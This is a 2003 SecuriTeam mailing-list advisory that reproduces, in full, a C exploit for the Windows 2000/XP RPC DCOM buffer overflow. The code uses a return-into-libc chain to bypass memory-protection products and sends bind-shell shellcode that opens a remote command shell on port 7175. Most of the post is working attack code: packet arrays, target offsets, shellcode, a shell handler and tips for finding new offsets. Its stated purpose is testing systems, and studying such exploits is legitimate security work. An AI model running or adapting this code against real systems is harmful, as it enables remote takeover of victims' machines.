[EXPL] Microsoft Windows XP/2000 Remote Return into Libc Exploit (RPC, DCOM)
From: SecuriTeam (support_at_securiteam.com)
Date: 11/09/03
- Previous message: SecuriTeam: "[NEWS] IBM DB2 Multiple Local Security Issues (UNIX Only)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 9 Nov 2003 19:44:44 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft Windows XP/2000 Remote Return into Libc Exploit (RPC, DCOM)
------------------------------------------------------------------------
SUMMARY
As we reported in our previous article:
<http://www.securiteam.com/securitynews/5LP0B0AB5C.html> Buffer Overrun In
RPCSS Service Could Allow Code Execution, a vulnerability in the RPC
server allows remote attackers to cause the service to execute arbitrary
code. The following exploit code can be used to test your system for the
mentioned vulnerability, even if the following protection mechanisms have
been implemented: OverflowGuard or StackDefender.
DETAILS
Exploit:
/*
* have you recently bought one of those expensive new windows security
products
* on the market? do you think you now have strong protection?
* Look again:
*
* *rpc!exec*
* by ins1der (trixterjack yahoo com)
*
* windows remote return into libc exploit!
*
* remote rpc exploit breaking non exec memory protection schemes
* tested against :
* OverflowGuard
* StackDefender (kernel32 imagebase randomization:O nice try guys.)
*
*
* currently breaking:
* Windows 2000 SP0 (english)
* Windows XP SP0 (english)
*
* to get new offsets use this:
* ------------------------------
* #include <windows.h>
* #include <stdio.h>
*
* int main()
* {
* HANDLE h1,h2;
* unsigned long addr1,addr2,addr3,addr4;
* h1=LoadLibrary("ntdll.dll");
* h2=LoadLibrary("MSVCRT.dll");
* addr1=(unsigned long)GetProcAddress(h1,"NtAllocateVirtualMemory");
* addr2=(unsigned long)GetProcAddress(h2,"memcpy");
* addr3=(unsigned long)GetProcAddress(h1,"NtProtectVirtualMemory");
* for (addr4=addr1;addr4<addr1+0xffff;addr4++)
* {
* if (!memcmp((void*)addr4,"\xc9\xc3",2)) break;
* }
* printf("0x%x 0x%x 0x%x 0x%x\n",addr1,addr2,addr3,addr4);
* return 0;
* }
* -----------------------------
* to get the last offset use a standard rpc dcom exploit with the last
* \x90\x90 before the shellcode replaced with \xcd\x21. run the exploit
* and read the drwatson logs. substract 0xA5 from the fault address.
*
*
* Shouts go to:
* w00pz, SpaceCow, Int3, lacroix, misu200, j00(xor),
* s0ny, crisis, and to all my true friends.
*
*
* Enjoy!
*
*/
#include <sys/socket.h>
#include <netinet/in.h>
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03,0x00,0x00,0xE5,0x00,0x00,0x00,
0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45,0x64,0x49,0xB0,0x70,0xDD,0xAE,
0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E,0x0D,0x00,0x00,0x00,0x00,0x00,
0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D,0xCE,0x11,0xA6,0x6A,0x00,0x20,
0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41,0x52,0x42,0x01,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0xA8,0xF4,0x0B,0x00,
0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,
0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,
0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29,0xCD,0x00,0x00,0x00,0x00,0x00,
0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,
0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x58,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x78,0x00,0x00,0x00,
0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,
0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09,0x02,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x78,0x19,0x0C,0x00,
0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00,0x00,0x00,0x70,0xD8,0x98,0x93,
0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00,0x00,0x00,0x32,0x00,0x31,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00,0x00,0x00,0x60,0x00,0x00,0x00,
0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03,0x00,0x00,0x00,0x00,0x00,0x00,
0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x00,0x00,0x00,
0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E,0xE9,0x4A,0x99,0x99,0xF1,0x8A,
0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00,0x00,0x00,0x78,0x00,0x6E,0x00,
0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00,0x58,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00,0x00,0x00,0x30,0x00,0x2E,0x00,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00,0x00,0x00,0x0E,0x00,0xFF,0xFF,
0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00,0x00,0x00,0x5C,0x00,0x5C,0x00
};
unsigned char request3[]={
0x5C,0x00,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,
0x35,0x00,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,
0x31,0x00,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
unsigned char request4[]={
0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,
0x00,0x00,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,
0x28,0x8C,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
struct offset
{
char *description;
unsigned long valloc;
unsigned long amemcpy;
unsigned long vprot;
unsigned long ret;
unsigned long frame;
};
struct offset targets[]=
{
{"Windows 2000 SP0 (english)",
0x77f95da9,
0x78001194,
0x77f82ffb,
0x77f96800,
0x52f770
}
,
{"Windows XP SP0 (english)",
0x77f7e4c3,
0x77c42e10,
0x77f7ec43,
0x77f80a07,
0x5bf79c
}
,
{NULL,0,0,0,0,0}
};
unsigned char shell[]=
"\x46\x00\x58\x00"
"\x4E\x00\x42\x00"
"\x46\x00\x58\x00"
"\x46\x00\x58\x00"
"\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\xff\xff\xff\xff"
"\xff\xff\xff\xff"
"\xcc\xe0\xfd\x7f"
"\xcc\xe0\xfd\x7f"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x83\xec\x34\x8b\xf4\xe8\x47\x01\x00\x00\x89\x06\xff\x36\x68\x8e"
"\x4e\x0e\xec\xe8\x61\x01\x00\x00\x89\x46\x08\xff\x36\x68\xad\xd9"
"\x05\xce\xe8\x52\x01\x00\x00\x89\x46\x0c\x68\x6c\x6c\x00\x00\x68"
"\x33\x32\x2e\x64\x68\x77\x73\x32\x5f\x54\xff\x56\x08\x89\x46\x04"
"\xff\x36\x68\x72\xfe\xb3\x16\xe8\x2d\x01\x00\x00\x89\x46\x10\xff"
"\x36\x68\xef\xce\xe0\x60\xe8\x1e\x01\x00\x00\x89\x46\x14\xff\x76"
"\x04\x68\xcb\xed\xfc\x3b\xe8\x0e\x01\x00\x00\x89\x46\x18\xff\x76"
"\x04\x68\xd9\x09\xf5\xad\xe8\xfe\x00\x00\x00\x89\x46\x1c\xff\x76"
"\x04\x68\xa4\x1a\x70\xc7\xe8\xee\x00\x00\x00\x89\x46\x20\xff\x76"
"\x04\x68\xa4\xad\x2e\xe9\xe8\xde\x00\x00\x00\x89\x46\x24\xff\x76"
"\x04\x68\xe5\x49\x86\x49\xe8\xce\x00\x00\x00\x89\x46\x28\xff\x76"
"\x04\x68\xe7\x79\xc6\x79\xe8\xbe\x00\x00\x00\x89\x46\x2c\x33\xff"
"\x81\xec\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xff\x56\x18\x50"
"\x50\x50\x50\x40\x50\x40\x50\xff\x56\x1c\x8b\xd8\x57\x57\x68\x02"
"\x00\x1c\x07\x8b\xcc\x6a\x16\x51\x53\xff\x56\x20\x57\x53\xff\x56"
"\x24\x57\x51\x53\xff\x56\x28\x8b\xd0\x68\x65\x78\x65\x00\x68\x63"
"\x6d\x64\x2e\x89\x66\x30\x83\xec\x54\x8d\x3c\x24\x33\xc0\x33\xc9"
"\x83\xc1\x15\xab\xe2\xfd\xc6\x44\x24\x10\x44\xfe\x44\x24\x3d\x89"
"\x54\x24\x48\x89\x54\x24\x4c\x89\x54\x24\x50\x8d\x44\x24\x10\x54"
"\x50\x51\x51\x51\x6a\x01\x51\x51\xff\x76\x30\x51\xff\x56\x10\x8b"
"\xcc\x6a\xff\xff\x31\xff\x56\x0c\x8b\xc8\x57\xff\x56\x2c\xff\x56"
"\x14\x55\x56\x64\xa1\x30\x00\x00\x00\x85\xc0\x78\x0c\x8b\x40\x0c"
"\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09\x8b\x40\x34\x8b\xa8\xb8\x00"
"\x00\x00\x8b\xc5\x5e\x5d\xc2\x04\x00\x53\x55\x56\x57\x8b\x6c\x24"
"\x18\x8b\x45\x3c\x8b\x54\x05\x78\x03\xd5\x8b\x4a\x18\x8b\x5a\x20"
"\x03\xdd\xe3\x32\x49\x8b\x34\x8b\x03\xf5\x33\xff\xfc\x33\xc0\xac"
"\x3a\xc4\x74\x07\xc1\xcf\x0d\x03\xf8\xeb\xf2\x3b\x7c\x24\x14\x75"
"\xe1\x8b\x5a\x24\x03\xdd\x66\x8b\x0c\x4b\x8b\x5a\x1c\x03\xdd\x8b"
"\x04\x8b\x03\xc5\xeb\x02\x33\xc0\x8b\xd5\x5f\x5e\x5d\x5b\xc2\x04"
"\x00\x90\x90\x90\x80\xbf\x32\x94\x80\xbf\x32\x94";
struct frame1
{
unsigned long frame0;
unsigned long ret;
}fr1;
struct retstruct
{
unsigned long frame1;
unsigned long valloc;
unsigned long ret1;
unsigned long dummy1;
unsigned long pointer11;
unsigned long zero;
unsigned long pointer12;
unsigned long type;
unsigned long prot;
unsigned long frame2;
unsigned long amemcpy;
unsigned long ret2;
unsigned long dest;
unsigned long src;
unsigned long size2;
unsigned long frame3;
unsigned long vprot;
unsigned long ret3;
unsigned long dummy2;
unsigned long pointer21;
unsigned long pointer22;
unsigned long newprot;
unsigned long oldprot;
}rets;
void prepare_ret(int id)
{
rets.type=0x3000;
rets.prot=0x4;
rets.newprot=0x20;
rets.valloc=targets[id].valloc;
rets.amemcpy=targets[id].amemcpy;
rets.vprot=targets[id].vprot;
fr1.ret=rets.ret1=rets.ret2=targets[id].ret;
fr1.frame0=targets[id].frame;
rets.frame1=fr1.frame0+9*4;
rets.frame2=rets.frame1+6*4;
rets.oldprot=fr1.frame0;
rets.frame3=rets.frame1;
rets.size2=sizeof(shell);
rets.src=fr1.frame0;
rets.dest=0x55555000;
rets.ret3=0x5555506c;
rets.dummy1=rets.dummy2=0xffffffff;
rets.zero=0;
*(int*)(shell+148)=0x55555000;
*(int*)(shell+152)=sizeof(shell);
*(int*)(shell+140)=0x55555000;
*(int*)(shell+144)=sizeof(shell);
rets.pointer11=fr1.frame0+92;
rets.pointer12=fr1.frame0+96;
rets.pointer21=fr1.frame0+100;
rets.pointer22=fr1.frame0+104;
memcpy(shell+32,&fr1,sizeof(fr1));
memcpy(shell+48,&rets,sizeof(rets));
}
void entershell(int sock)
{
char buf[3000];
fd_set fdr;
int rs;
FD_ZERO(&fdr);
FD_SET(sock,&fdr);
FD_SET(0,&fdr);
for(;;)
{
FD_SET(sock, &fdr);
FD_SET(0, &fdr);
if(select(FD_SETSIZE,&fdr,NULL,NULL,NULL)<0) break;
if(FD_ISSET(sock, &fdr))
{
if((rs=read(sock,buf,sizeof(buf)))<0)
{
printf("connection lost\n");
return;
}
if(write(1,buf,rs)<0) break;
}
if(FD_ISSET(0,&fdr))
{
if((rs=read(0,buf,sizeof(buf)))<0)
{
printf("[-] Connection lost..\n");
exit(1);
}
if (write(sock,buf,rs) < 0) break;
}
usleep(100);
}
printf("connection closed\n");
return;
}
int main(int argc, char **argv)
{
int sock,i,len1;
struct sockaddr_in sin;
unsigned char buf1[0x1000],buf2[0x1000];
if(argc<3)
{
printf("###############################\n");
printf("return into libc rpc exploit\n");
printf("ins1der 2003\n");
printf("downloaded on www.k-otik.com\n");
printf("*****************************************\n");
printf("usage: %s <ip> <id>\n", argv[0]);
printf("*****************************************\n");
printf("targets:\n");
printf("-----------------------------------------\n");
for (i=0;targets[i].description!= NULL;i++)
{
printf("%d\t%s\n",i,targets[i].description);
}
printf("-----------------------------------------\n");
return 0;
}
printf("Exploiting %s...\n",argv[1]);
prepare_ret(atoi(argv[2]));
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=inet_addr(argv[1]);
sin.sin_port=htons(135);
if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
{
perror("socket ");
return 0;
}
if(connect(sock,(struct sockaddr*)&sin, sizeof(sin)))
{
perror("connect ");
return 0;
}
memcpy(buf2,request1,sizeof(request1));
len1=sizeof(request1);
*(unsigned long *)(request2)=*(unsigned long
*)(request2)+sizeof(shell)/2;
*(unsigned long *)(request2+8)=*(unsigned long
*)(request2+8)+sizeof(shell)/2;
memcpy(buf2+len1,request2,sizeof(request2));
len1=len1+sizeof(request2);
memcpy(buf2+len1,shell,sizeof(shell));
len1=len1+sizeof(shell);
memcpy(buf2+len1,request3,sizeof(request3));
len1=len1+sizeof(request3);
memcpy(buf2+len1,request4,sizeof(request4));
len1=len1+sizeof(request4);
*(unsigned long *)(buf2+8)=*(unsigned long
*)(buf2+8)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long
*)(buf2+0x10)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long
*)(buf2+0x80)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long
*)(buf2+0x84)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long
*)(buf2+0xb4)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long
*)(buf2+0xb8)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long
*)(buf2+0xd0)+sizeof(shell)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long
*)(buf2+0x18c)+sizeof(shell)-0xc;
if (send(sock,(char*)bindstr,sizeof(bindstr),0)==-1)
{
perror("send");
return 0;
}
recv(sock,(char*)buf1,1000,0);
if (send(sock,(char*)buf2,len1,0)== -1)
{
perror("send");
return 0;
}
close(sock);
sleep(1);
sin.sin_port = htons(7175);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("socket");
return(0);
}
if(connect(sock,(struct sockaddr *)&sin, sizeof(struct sockaddr)) ==
-1)
{
printf("Exploit failed\n");
return(0);
}
printf("Entering shell\n");
entershell(sock);
return 1;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:trixterjack@yahoo com>
ins1der.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] IBM DB2 Multiple Local Security Issues (UNIX Only)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [EXPL] Serv-U FTPD "SITE CHMOD" Command Remote Exploit
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... unsigned char szCommand;
... // 28 bytes decode by lion, ... void shell (int sock) ... (Securiteam) - [UNIX] X-Chat Socks5 Buffer Overflow Vulnerability (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... unsigned int packetlen,
addrlen; ... unsigned char buf; ... void getshell; ... (Securiteam) - [EXPL] Quake 3 Buffer Overflow (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... port and exit cleanly with
an unsuspicious error message. ... unsigned char ipx; ... int hooklen; //
for both sendservercommand and directconnect ... (Securiteam) - [EXPL] Microsoft Word Buffer Overflow (Exploit 2)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Word Buffer Overflow
... invalid memory acess and in some cases arbitrary overwrites. ... (Securiteam) - [EXPL] Windows RPC Universal Exploit
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... unsigned char request1={
... DWORD GETSTRCS ... int attack ... (Securiteam)
